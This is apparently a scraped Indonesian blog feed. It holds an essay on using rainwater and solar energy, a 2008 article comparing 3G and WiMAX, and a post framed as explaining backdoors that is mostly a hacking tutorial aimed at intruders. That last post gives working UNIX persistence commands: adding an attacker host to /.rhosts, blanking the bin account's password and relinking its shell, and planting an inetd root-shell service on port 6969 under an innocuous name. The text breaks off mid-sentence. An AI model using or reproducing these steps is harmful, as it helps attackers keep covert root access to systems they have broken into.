Banyak hal yang dapat kita lakukan untuk bangsa ini, mulai dari hal yang kecil sekalipun sangat berarti bagi bangsa Indonesia. Kita bisa memanfaatkan hujan sebagai salah satu sumber air yang cukup berguna bagi kita disaat kemarau. Selain daerah-daerah di Indonesia yang tidak kebanjiran lagi sewaktu musim hujan, kita juga tidak kesulitan mendapatkan air bersih dikala musim kemarau. Penerapan teknologi ini dapat kita lakukan dengan membuat corong-corong dan tabung penampungan untuk air hujan, jadi sewaktu hujan, air-air hujan yang membasahi daerah itu akan masuk ke dalam tabung penampungan melalui corong-corong tadi. Untuk peletakkan corong-corong dan penampung air hujan, di letakkan di daerah-daerah yang rentan hujan seperti Bogor, Bandung ataupun daerah-daerah yang memiliki curah hujan tinggi di indonesia. Selain dapat menghindari bencana alam banjir yang kerap terjadi di beberapa daerah di indonesia, air tadi juga dapat dimanfaatkan untuk menghindari kekeringan di saat musim kemarau. Memang melakukan hal ini memakan waktu dan biaya yang cukup besar untuk membangunnya, tapi semua itu tidak menjadi masalah dengan melihat begitu besarnya manfaat yang diberikan. Kita ambil contoh saja Jakarta, bayangkan saja jika terjadi kebanjiran di ibu kota indonesia. Berapa kerugian yang kita terima. Mulai dari kerugian materi, waktu, jiwa dan raga. Bayangkan saja dengan banjir yang merendam hingga 1-2 M, seluruh aktifitas yang terjadi di beberapa wilayah di jakarta bisa lumpuh total. Ini jelas sangat merugikan bangsa ini. Selain menjadi pusat ibu kota, Jakarta juga menjadi pusat perekonomian di Indonesia. Setelah membaca penjelasan saya tadi mungkin anda sudah dapat sedikit gambaran manfaat dari teknologi yang saya bicarakan tadi.

Selain memanfaatkan musim hujan, kita juga bisa memanfaatkan sinar matahari sebagai sumber energi alternatif untuk bangsa ini. Sebagai contoh kita bisa membuat suatu alat yang bisa memanfaatkan energi matahari. Pembuatan alat ini bukan tidak berdasar, Indonesia yang merupakan salah satu negara yang dilalui garis khatulistiwa memiliki suhu yang relatif panas. Bisa kita bayangkan bila kita dapat memanfaatkan anugerah yang diberi oleh yang maha pencipta kepada kita. Kita tidak perlu lagi antrian panjang untuk membeli BBM, selain itu kampanye dunia untuk global warming bisa dijalankan.

Sungguh betapa indahnya negeri Indonesia ini, disini sudah tersedia apapun yang di negara lain belum tentu tersedia. Sekarang kita tinggal memanfaatkannya dan mengelolanya dengan baik. Dengan sendirinya indonesia akan menjadi negara “super power” jika seluruh elemen masyarakatnya mampu memanfaatkan sumber daya alamnya.

Jika kita mau untuk sedikit menyumbang pemikiran untuk membangun Indonesia ini tidak mungkin negeri kita yang dulu jaya dan disegani oleh semua bangsa akan kembali jaya dan disegani oleh setiap bangsa. Bahkan bangsa kita juga bisa menjadi negara “super power” seperti Amerika karena semua yang kita perlukan untuk menjadi negara adidaya sudah tersedia di negeri ini. Baik itu dari sumber daya alam maupun sumber daya manusia. Sekarang tergantung dari kita untuk mengolah dan mengelola “mukjizat” yang sudah diberikan Yang Maha Pencipta kepada kita. Itu semua memerlukan peran semua pihak, baik itu dari Presiden, Politikus, Petani, Buruh, Mahasiswa, Tukang Becak, Penjual Pecel, Pemulung, Pekerja Bangunan, Karyawan Kantor yang berdasi, serta Anda. Marilah kita mulai membenahi negeri besar ini. Tahun ini merupakan tahun yang tepat untuk melakukan perubahan, karena pada tahun ini bangsa kita mengadakan perhelatan akbar untuk menentukan nasib bangsa ini yang dipilih secara langsung oleh rakyatnya sendiri. Oleh karena itu, marilah kita sukseskan perhelatan akbar itu dengan memilih para wakil-wakil kita yang memang ahli di bidangnya, jangan hanya orang-orang yang pandai mengumbar janji tapi tidak mampu berbuat. Negeri ini sudah tidak perlu lagi pemimpin yang pintar bicara, tapi negeri ini butuh pemimpin yang berani mengambil keputusan untuk membangun negeri ini menjadi negeri yang lebih baik.

*( Di Publikasikan Pada http://www.adesurya-online.blogspot.com

3G DAN WiMAX TEKNOLOGI KOMUNIKASI MASA DEPAN

noreply@blogger.com (adesurya-online.blogspot.com) — Mon, 29 Dec 2008 07:39:00 +0000

Oleh: Ade Surya Iskandar

Perkembangan teknologi nirkabel di Indonesia, mulai dari generasi pertama low-speed, generasi kedua digital, dan generasi ketiga digital high-speed, membawa perubahan besar dalam berbagai aspek kehidupan sosial masyarakat. Oleh sebab itu teknologi jaringan nirkabel terus berevolusi dengan cepatnya. Mulai dari first-generation technology (1G), two-generation technology (2G) hingga third-generation technology (3G) berkembang dengan cepat, Baru saja teknologi nirkabel third-generation technology (3G) berkembang di Indonesia, Masyarakat Indonesia kembali dikagetkan dengan teknologi baru yang dinamakan Worldwide Interoperability for Microwave Access (WiMax). Teknologi ini sanggup menyediakan kecepatan hingga 80 Mbps. Apakah WiMax bisa disebut penerus 3G atau justru penyaing 3G?

3G dan WiMax

Saat ini dikenal dua bentuk pengembangan 3G, yaitu dari sisi GSM (Global System for Mobile Communication) yang dipelopori oleh 3G Partnership Project dan CDMA (Code Division Multiple Access) yang dipelopori oleh 3G Partnership Project 2 (3GPP2). Kedua teknologi tidak kompatibel dan sesungguhnya saling berkompetisi.

3G adalah teknologi generasi ketiga selular. Generasi pertama diwakili oleh teknologi AMPS (Advanced Mobile Phone System) yang berkembang di Amerika Serikat dan TACS (Total Access Communication Service) di Eropa. Teknologinya yang menggunakan sistem analog ini baru bisa melayani komunikasi suara. Generasi kedua, inilah mulainya era GSM (Global System for Mobile Communication), telah menggunakan teknologi digital dan bisa melayani komunikasi SMS (short message service). Di dunia teknologi informasi dan telekomunikasi, juga dikenal teknologi broadband access lainnya, baik yang berupa Wired (kabel) maupun Wireless (nirkabel). Wi-Fi pada frekuensi 2.4 GHz telah dibebaskan penggunaannya. Seperti kita saksikan saat ini, penggunaan pemancar 2.4 GHz sudah marak di Indonesia terutama untuk keperluan Warung Internet (Warnet) dan Komunitas (RT/RW Net), juga perusahaan kecil & menengah, dan dunia pendidikan. Titik-titik hotspot di beberapa kota besar di Indonesia (di mall, ruang tunggu bandara, hotel, tempat makan, taman, masjid, dan kompleks perumahan) mulai menjamur dengan akses berbayar maupun tidak. Semua itu memanfaatkan teknologi Wi-Fi.

WiMAX (Worldwide Interoperability for Microwave Access) adalah sebuah tanda sertifikasi untuk produk-produk yang lulus tes cocok dan sesuai dengan standar IEEE 802.16. WiMAX merupakan teknologi nirkabel yang menyediakan hubungan jalur lebar dalam jarak jauh. WiMAX bisa juga dikatakatan teknologi broadband yang memiliki kecepatan akses yang tinggi dan jangkauan yang luas. WiMAX adalah evolusi dari teknologi BWA sebelumnya dengan fitur-fitur yang lebih menarik. Disamping kecepatan data yang tinggi mampu diberikan, WiMAX juga membawa isu open standar. Dalam arti komunikasi perangkat WiMAX walaupun vendor yang berbeda tetap dapat dilakukan (tidak proprietary). Dengan kecepatan data yang besar (sampai 70 MBps), WiMAX layak diaplikasikan untuk ‘last mile’ broadband connections, backhaul, dan high speed enterprise.

Banyak dikalangan masyarakat yang salah persepsi dengan mengatakan bahwa WiMAX dan WiFi adalah sama, yang membedakan WiMAX dengan Wi-Fi adalah standar teknis yang bergabung di dalamnya. Jika WiFi menggabungkan standar IEEE 802.11 dengan ETSI (European Telecommunications Standards Intitute) HiperLAN sebagai standar teknis yang cocok untuk keperluan WLAN, sedangkan WiMAX merupakan penggabungan antara standar IEEE 802.16 dengan standar ETSI HiperMAN.

Video Call, “Best Application” 3G di Indonesia?

Seperti disebutkan di atas, bahwa 3G bisa dipakai untuk data (misalnya akses internet), suara (voice call), dan video (call & streaming). Pertanyaannya, manakah yang akan menjadi best application3G? Pada fase tertentu, operator 3G harus menyiapkan sesi khusus untuk memperkirakan best application apa yang sekiranya akan booming. Di setiap negara, ada kemungkinan berbeda-beda, tergantung budaya masyarakatnya. Kita telah melihat, bagaimana masyarakat Jepang dan Korea memanfaatkan 3G dan bagaimana masyarakat Eropa kurang memanfaatkannya.

Di Indonesia, kampanye video call dan video streaming sangat gencar pada awal perkenalan 3G. Sementara itu, seperti kita ketahui, pada era 2G, SMS telah menjadi best application. Budaya masyarakat untuk ber-SMS sudah mulai terbentuk karena layanan tersebut dirasakan praktis dan lebih murah. Memindahkan kebiasaan ber-SMS ke video call, harus dibarengi dengan penerapan tarif yang terjangkau, jika tidak lebih murah setidaknya sama dengan tarif voice call.

Tarif bisa menjadi sesuatu yang sensitif di negara dalam kondisi ekonomi seperti Indonesia. Indonesia memiliki jumlah penduduk yang sangat besar, namun dengan penetrasi pasar informasi dan telekomunikasi (infocom) yang masih kecil. Dengan kondisi pasar seperti itu, maka bisnis infocom bisa memilih model tarif murah dengan pelanggan banyak, atau tarif mahal dengan pelanggan terbatas.

Video call adalah modal komunikasi baru dan bisa cukup sensasional. Namun ia tidak akan mampu menjadi best application 3G jika operator tidak peka membaca antara kebutuhan pelanggan dan besarnya tarif yang dipatok.

Membandingkan 3G dengan broadband access lainnya sekilas bisa dianggap kurang relevan. Namun, atas nama visi konvergensi, maka hal ini bisa saja dianggap relevan.
3G lebih populer di kalangan masyarakat Indonesia sebagai fitur handphone GSM. (Meskipun sebenarnya 3G juga ada dalam teknologi CDMA 1X). Bagi beberapa pengguna tingkat lanjut (advance), fitur ini bisa dimanfaatkan lebih optimal, termasuk untuk akses internet. Semenjak era 2.5G pun, mereka mungkin telah memanfaatkan GPRS untuk akses internet meskipun dengan kecepatan terbatas.

3G Mobile dan Praktis

3G, dengan perangkat handphone-nya yang sudah banyak beredar di Indonesia, sebaiknya mengandalkan kemampuan mobilitasnya dan kepraktisannya. Mobilitas dalam hal ini, telah diakui, terutama kemampuan roaming-nya. Kepraktisan dalam hal ini, tentu terkait dengan terminal pelanggan atau handset, terbukti ringan ditenteng dan masih bisa dimasukkan ke dalam saku.

Keberadaan content provider di Indonesia yang mencapai 200 perusahaan, hendaknya bisa didorong untuk lebih kreatif. Sudah barang tentu hal itu harus diimbangi dengan skema kerjasama dengan operator yang saling menguntungkan sehingga (itu tadi) mampu terus merangsang kreativitas. Keberadaan aplikasi yang praktis dan menyentuh langsung kebutuhan personal pelanggannya, itulah yang menentukan masa depan 3G di Indonesia. Bergeraklah ke sana, sebelum masa surut itu tiba. Setiap teknologi memiliki umurnya masing-masing

Prospek Perkembangan WiMax dan 3G

Kehadiran teknologi 3G di Indonesia semakin menyemarakkan ragam layanan akses pita lebar di Indonesia. Keunggulannya dalam hal mobilitas ditambah kecepatan transmisi data yang makin kencang, membawa 3G menjadi modal komunikasi data, suara, dan video yang menjanjikan di masa depan.

Akhirnya persaingan ada pada daya cakupan, tarif, dan layanan konten. Di samping besarnya peluang pasar 3G (dan broadband access pada umumnya), perlu tetap disadari bahwa Indonesia masih miskin dalam hal yang disebutkan terakhir tadi.

WiMax terdiri dua layanan yakni Fixed WiMax yang mengacu pada pemanfaatan teknologi untuk terminal yang berposisi tetap. Sedangkan Mobile WiMax mengacu pada teknologi nirkabel pita lebar untuk perangkat komunikasi bergerak.

Kelebihan WiMax memiliki kecepatan transfer data hingga 70 Mbps dan jarak jangkauan hingga 50 km. Dinyatakan pula pada tahap awal akan diterapkan untuk layanan fixed dengan teknologi IEEE 802.16d. Seperti diketahui bahwa WiMax dengan standar IEEE 802.16 terdiri atas 802.16a/d revisi untuk fixed, 802.16e untuk mobilitas terbatas (nomadic), dan 802.20 untuk mobilitas yang penuh.

Hasnul Suhaimi, dirut PT Excelcomindo kepada Tren Digit@l mengemukakan minatnya untuk masuk ke layanan WiMax. Namun, dia menyarankan agar dibuka kesempatan seluas-luasnya bagi perusahaan untuk masuk layanan itu.

Teknologi Alternatif

Memang Wimax akan menjadi salah satu teknologi alternatif di masa mendatang. Namun yang menjadi persoalan akankah teknologi WiMax bisa diterima di masyarakat dan menjadi pesaing layanan 3G yang baru digelar kalangan operator seluler? Inilah pertanyaan yang mengemuka menyusul rencana digelarnya WiMax tersebut.

Sebuah survei pasar yang dilakukan Pyramid Researd menunjukkan dari 100 perusahaan TV kabel dan operator telekomunikasi di seluruh dunia, sedikitnya 75 perusahaan akan menggunakan teknologi berbasis jaringan WiMax. Harus diakui, itu tidak menjadi alasan bagi operator seluler untuk keluar dari bisnis jaringan seluler-yang dibangun dengan dana miliaran dolar, tapi mereka menciptakan peluang melalui akses pita lebar nirkabel sebagai komplimen jasa telepon tetap atau jaringan seluler.

Sara Harris, analis dari Strategy Analitics menambahkan, pihaknya melihat WiMax baru akan booming pada awal dekade mendatang. Bahkan, tambahnya, pengguna Wimax hanya mencapai 6% dari 500 juta pengguna teknologi berbasis nirkabel pita lebar pada 2010. Apa yang dikemukakan itu bisa terjadi di Indonesia. Operator telekomunikasi tentunya tidak ingin layanan 3G dengan investasi yang besar menjadi sia-sia dan tersaingi dengan munculnya WiMax. Sedangkan harapan kalangan BRTI yang mengharapkan layanan WiMax akan lebih difokuskan di daerah rural tentunya adalah tidak mungkin.

Penerapan Teknologi WiMax dan 3G Dalam Kehidupan Sehari-hari

Berdasarkan pembagian segmen penggunaan teknologi wireless, WiMAX memang ditujukan untuk penggunaan di segmen Metropolitan Area Networks (MAN). MAN biasanya terdiri dari kumpulan LAN, dan meliputi area dalam radius 50 km. Dari segi segmen penggunaan jelas WiMax ditujukan untuk segmen yang sama dengan teknologi kabel tembaga (contohnya DSL).
Masalah yang sering terjadi pada penggunaan teknologi DSL dalam menyediakan akses broadband ke pengguna biasanya sering disebut sebagai "last-mile problems", atau masalah rentang jarak terakhir antara rumah atau kantor pengguna dan jaringan penyedia layanan broadband. Yang termasuk masalah last-mile bagi pengguna adalah rendahnya laju data broadband akibat terbaginya bandwidth ke banyak pengguna di jaringan.

Solusi yang paling mungkin adalah menggunakan infrastruktur nirkabel. Untuk nirkabel, teknologi yang umum digunakan adalah jaringan WiFi yang beroperasi pada frekuensi 2,4GHz. Untuk suatu kota saja yang ada di Indonesia, solusi menggunakan WiFi dirasakan kurang memenuhi kebutuhan karena jangkauannya yang sangat terbatas, dan besarnya arus data yang bisa dilewatkan.

Walaupun banyak yang memprediksi bahwa WiMax akan menggerogoti pasar 3G (hasil riset TelecomViews bahwa pada tahun 2009 menyebutkan lebih dari 40% pasar broadband nirkabel akan dikuasai oleh WiMax), 3G tidak akan hilang dan kemungkinan besar kedua teknologi tersebut akan hidup secara berdampingan. 3G sudah lebih mapan dibanding WiMax, dan sudah banyak dipasang oleh berbagai negara. Selain itu 3G juga memiliki kelebihan dalam menyediakan mobilitas dalam daerah cakupan yang lebih luas. Teknologi 3G juga tidak stagnan, dan terus berkembang. Tahun ini base station 3G akan diupgrade agar mendukung High Speed Dowlink Packet Access(HSDPA) yang akan menjadi feature standar bagi ponsel 3G sejak tahun 2006.

Sementara itu, WiMax memiliki masa depan cerah karena dilihat menawarkan kesempatan bagi operator telekomunikasi alternatif untuk menawarkan layanan broadband dengan harga bersaing untuk pelanggan di daerah metropolitan, dan juga untuk pelanggan di daerah pedesaan atau kota kecil dengan infrastruktur terbatas. Kombinasi dengan teknologi lain seperti VoIP juga dapat menjadi peluang bisnis baru.

Yang jelas di masa depan tidak ada vendor nirkabel atau penyedia layanan yang akan mengikat dirinya pada satu jenis teknologi broadband, atau satu platform jaringan. Yang memegang kendali adalah konsumen. Bagi konsumen yang penting adalah bagaimana kebutuhan (berkomunikasi lewat telepon, membaca e-mail, download content, video streaming) dapat dipenuhi. Pertanyaan tentang "bagaimana" kebutuhan itu akan bisa dipenuhi tidak akan menjadi batasan.

Aral Melintang bagi WiMax

Kendala utama yang menghadang implementasi teknologi WiMax tidak lain adalah masalah kebijakan dan regulasi pemerintah untuk regulasi nirkabel. Rasanya masih belum hilang dari ingatan kita ulasan tentang kisruhnya pengaturan hak lisensi 3G. Kemungkinan keuntungan yang menggiurkan dari penguasaan frekuensi nirkabel boleh jadi akan membuat banyak pihak berebut, dan akhirnya merugikan pengguna yang harus membayar mahal untuk dapat menikmati layanan broadband.

Implementasi teknologi Pre-WiMax di Aceh contohnya, sempat dikuatirkan terhambat oleh masalah yang terkait dengan regulasi. Berdasarkan peraturan pemerintah, penggunaan perangkat WBA yang bekerja di frekuensi 5GHz membutuhkan izin frekuensi yang hanya bisa didapatkan oleh operator telekomunikasi. Pengguna juga dikenai biaya hak penggunaan (BHP) frekuensi yang harus dibayarkan per tahun. Selain itu, bea masuk perangkat dan bea impor lain bisa mencapai 30% dari harga perangkat. Perlu dipikirkan penerapan suatu strategi pengaturan frekuensi nirkabel yang mengedepankan paradigma kepentingan publik sehingga akses broadband menjadi sesuatu yang dapat dinikmati oleh sebanyak-banyaknya masyarakat.

Selain masalah regulasi, WiMax juga mungkin akan butuh waktu sedikit lama sebelum dapat digunakan secara luas oleh masyarakat. Saat ini harga perangkat-perangkat WiMax masih sangat mahal karena masih diproduksi secara terbatas. Selain itu, perangkat-perangkat berteknologi WiMax yang sekarang sudah ada di pasaran juga belum melewati proses sertifikasi dari WiMax Forum sehingga belum dijamin kinerja maupun kompabilitasnya satu sama lain.

Respon Pasar Terhadap WiMax Dibandingkan dengan 3G

Pengembangan 3G diusung oleh beberapa vendor telekomunikasi, terutama kalangan operator seluler yang saat ini ada, baik GSM maupun CDMA, yang utamanya juga didukung oleh kalangan manufaktur yang memroduksi perangkat portabel 3G, baik ponsel maupun PDA phone . Sedang WiMAX lebih banyak diusung oleh kalangan industri, seperti Intel dan yang tergabung dalam WiMAX Forum, termasuk juga kalangan operator telekomunikasi, penyedia jasa akses internet (ISP – internet service provider ) dan vendor perangkat, seperti laptop, telepon genggam, PDA dan sebagainya.

3G, boleh dikata, merupakan inisiasi layanan baru, terutama karena kebutuhan para konsumen yang tak hanya berhenti pada layanan komunikasi suara bergerak dan nirkabel, melainkan juga layanan komunikasi data dan multimedia. Sedang WiMax, sejak awal memang dirancang untuk menyediakan layanan komunikasi data nirkabel kapasitas besar ( wireless broadband ). Kapasitas layanan WiMAX ini, bahkan, dapat bersaing dengan layanan DSL dan cable modem , yang pengembangannya diperkirakan banyak analis justru akan mengubah peta industri telekomunikasi dunia.

Backdoor? Apa Sih? Gmna Nanggulanginnya?

noreply@blogger.com (adesurya-online.blogspot.com) — Wed, 17 Dec 2008 04:43:00 +0000

Waduh,, dah lama juga saya ngak posting di blog ini, ini dikarenakan terlampau sibuk nya dengan aktifitas lainnya (cielah,, narzis kan? Bcanda doang). Baiklah untuk tidak memperpanjang basa-basi dikarenakan tidak baik dan nanti ada yang marah kita langsung aja ke TKP nya,,

Kali ini saya akan coba membahas tentang Backdoor atau pintu belakang. Saya akan coba membahas sedikit tentang apa itu backdoor, bagaimana backdoor itu terjadi dan bagaimana cara menanganinya, saya juga tidak bosan-bosannya meminta kritik dan saran kepada rekan-rekan jika terjadi kesalahan dalam pelaksanaan teknik ini karena saya juga baru di bidang hacking n security apalagi saya juga masih tergolong bocah ingusan yang tidak mengetahui apa-apa. Dan saya juga mengucapkan terima kasih kepada rekan-rekan yang telah memberikan masukan kepada saya.

Ok, Langsung saja kita ke teknik-teknik nya :

1. Eksploit

Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan

shell UNIX baru yang baru kamu 'dapatkan'. Dan mungkin sekarang kamu sudah

mulai bertanya-tanya, "apa sih eksploit (exploit, 'sploits) itu?". Dalam

konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan artinya

dalam konteks harfiah, yaitu 'pemanfaatan'. Tentunya eksploit-eksploit

'hacking' lebih spesifik lagi, yang kurang lebih bisa diartikan sebagai

'pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar

dari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahan

pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan

lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah

eksploit yang akan memberikan kita akses tidak terbatas ke seluruh aspek

dari sebuah sistem. Dalam UNIX, sering kita dengar istilah 'mengeksploit

program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root'

bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin

anda sudah alami sendiri, kadang sebuah cacat dalam program seperti maild

atau ftpd bisa dimanfaatkan untuk tujuan 'header forging', 'ip spoofing',

'denial of service attack', dan 'mail bombing' (hello, Anton Pardede!).

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan

eksploit remote. Eksploit lokal adalah jenis eksploit yang hanya bisa

dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu

melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,

sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk

di-eksploit. Contoh - contoh dari eksploit jenis ini adalah buffer

overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana

dua proses saling berlomba untuk menyelesaikan tugas masing-masing,

biasanya proses A disuruh untuk menjalankan suatu utilitas yang

membutuhkan privilese root temporer sementara proses B dirancang untuk

mencegat proses A sebelum proses A kembali statusnya ke privilese user

biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi

di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya bisa

mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu

berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol

(lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite'

lainnya. Biasanya eksploit diprogram dengan C, perl, atau sh. Namun kalau

ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak

eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di

situs-situs tertentu, seperti:

http://www.rootshell.com

http://www.antionline.com

http://www.rhino9.com

http://www.dhp.com/~fyodor

atau di situs kecoak, http://k-elektronik.org/arsip/eksploit

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa

mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja

eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang

dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah

satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file

/etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf).

Mungkin belum terlihat fatal, namun sekalinya sang 'cracker' berhasil

masuk ke dalam sistem memanfaatkan login dan password dari salah seorang

user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan

akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih

gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip

yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas

sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja

yang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi,

seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan

memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file

password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.

Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat

dari http://www.l0pht.com. Untuk menghemat waktu, banyak cracker yang

menulis skrip otomasi, jalankan skrip, tinggal berikan daftar

target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam

atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada

lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel

mengenai scanning/probing di situs-situs hacker).

Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti

eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain,

namun untuk digunakan masih perlu campurtangan dari user lokal untuk bisa

bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan

file password ke alamat email tertentu.)

2. Backdoor

Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat

belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke

suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu

saja sang programer di sini bisa juga diartikan 'sang penyusup'.

Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga

yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar

(baik hardware maupun software ) yang sengaja menempatkan backdoor tak

terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel

ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke

dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan

menyadari bahwa ada penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan

berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera

menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root.

Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan

harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu

atau lebih jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik

backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.

Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses

root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin

menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap

selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi

dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker,

kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa

sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif

dengan privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti

Backdoor di router-router, printserver, dll buatan 3Com), namun disini

akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem

UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan

melalui file /.rhosts:

korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar

-dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang boleh

mengakses account tanpa password), dan untuk masuk kembali ke sistem dari

account "ganjaman" di indohack2.ri.go.id :

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

poof! shell root tanpa password!

Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan

entri berikut dari file /etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas

sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh

UNIX sistem secara internal. Seringkali banyak diantara crackers yang

mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet

dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa

file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh

sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar

kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di

home directory milik bin. Kembali ke entri file password diatas, bisa kita

lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,

namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin'

dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah

ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau

/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren

kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa

keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah

entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau

string unik lainnya yang bukan merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya

ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada

tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut

rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat

salah satu port yang didefinisikan dalam "inetd":

root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >>

/etc/services

root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >>

/etc/inetd.conf

root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r

menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem

yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga

perintah diatas:

1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor

port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024

sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah

karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya

sysadmin tidak akan begitu curiga dengan nama seperti itu.

2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r

setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya

mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan

mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan

perintah-perintah selayaknya kita login lewat jalur normal. Sang shell

akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita.

Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu

lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti

/tmp/dev001).

3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang

baru saja kita luncurkan (id=0 - root!). Tentunya kamu bisa saja menulis

skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan

saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari

mesin host kita ke file .rhosts milik root.

Tentu jika sang admin memang keren kung funya, rlogind akan

dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu

periksa isi direktori dan file "history" milik root dan isinya menunjukkan

bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas

akan memberikan jalan masuk lewat belakang ke dalam sistem target (idih,

kesannya kayak cerita-cerita porno anal seks aja!). Sekarang kamu tinggal:

ganjaman@indohack2> telnet korban.lameisp.net.id 6969

nah, sistem kamu akan tersambung ke sistem target lewat port 6969,

sedangkan daemon inet di mesin korban akan menerima sambungan tersebut,

menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan

